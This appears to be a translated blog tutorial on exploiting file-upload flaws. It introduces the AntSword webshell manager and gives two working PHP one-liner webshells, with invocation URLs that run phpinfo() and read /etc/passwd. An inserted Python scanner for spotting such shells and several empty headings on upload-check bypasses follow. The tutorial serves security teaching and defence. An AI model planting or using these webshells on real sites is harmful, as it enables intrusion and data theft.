Using BurpSuite to exploit upload vulnerabilities

Using AntSword (Chinese Ant Sword)

I originally wanted to use China Chopper (the "Chinese kitchen knife") to demonstrate WebShell use, but China Chopper is too old and not open source, and copies of it have been found to contain various backdoors, so I have become wary of it. Here I use AntSword instead. AntSword is an open-source, cross-platform website administration tool, aimed mainly at legally authorized penetration testers and at webmasters doing routine administration. It is used in much the same way as China Chopper and is cross-platform.

Installing AntSword requires downloading two pieces, the loader and the source code. Both are hosted on GitHub:

> git clone https://github.com/AntSwordProject/antSword.git
> git clone https://github.com/AntSwordProject/AntSword-Loader.git

After downloading, open the AntSword.exe loader and select the antSword source code directory; the program then works properly. Next, let's look at how the commonly used small WebShells ("ponies") are written.

# Use eval to execute PHP functions
<?php eval($_REQUEST['cmd']); ?>

Invocation: http://lyshark.com/shell.php?cmd=phpinfo();

# Use system to execute system commands
<?php system($_REQUEST['cmd']); ?>

Invocation: http://lyshark.com/shell.php?cmd=cat /etc/passwd
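As a defender's counterpart to the two one-liners above, the following added example (not part of the original post) scans PHP source, such as the contents of an upload directory, for execution functions that are fed directly from request data. The function names, the sink list and the sample files are assumptions constructed for illustration.

```python
import re

# Code/command execution sinks; PHP function names are case-insensitive.
SINKS = ("eval", "assert", "system", "exec", "passthru", "shell_exec", "popen", "proc_open")
# Superglobals that a client fills from the URL, request body or cookies.
SOURCES = ("_REQUEST", "_GET", "_POST", "_COOKIE")

SINK_CALL = re.compile(
    r"(?<![$>:\w])(" + "|".join(SINKS) + r")\s*\("  # a call, not $var(), ->method() or ::static()
    r"[^;]*?"                                       # stay inside the same statement
    r"\$(?-i:(" + "|".join(SOURCES) + r"))\b",      # variable names are case-sensitive
    re.I | re.S,
)

def scan_php(source):
    """Return [(line_no, sink, source_var)] for sinks fed directly by request data."""
    hits = []
    for m in SINK_CALL.finditer(source):
        line_no = source.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group(1).lower(), "$" + m.group(2)))
    return hits

def flag_uploads(files):
    """Map file name -> hits for every file that contains at least one hit."""
    return {name: hits for name, src in files.items() if (hits := scan_php(src))}

# Constructed sample files: the two one-liners shown above (the second with
# different case and spacing) and a harmless script that must not be flagged.
SAMPLES = {
    "shell_eval.php": "<?php eval($_REQUEST['cmd']); ?>",
    "shell_system.php": "<?php\n// constructed sample\nSystem ( $_REQUEST['cmd'] );\n?>",
    "benign.php": "<?php $out = htmlspecialchars($_GET['q']); system('uptime'); ?>",
}

if __name__ == "__main__":
    for name, hits in flag_uploads(SAMPLES).items():
        for line_no, sink, var in hits:
            print(f"{name}:{line_no}: {sink}() receives {var}")
```

This is a first-pass triage pattern: it only catches request data passed to a sink within a single statement, so a clean result does not prove a file is safe.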

2. Client-side detection bypass

3. Server-side blacklist detection

4. Server-side whitelist detection

5. MIME verification bypass

6. Directory authentication bypass

Origin www.cnblogs.com/LyShark/p/11300962.html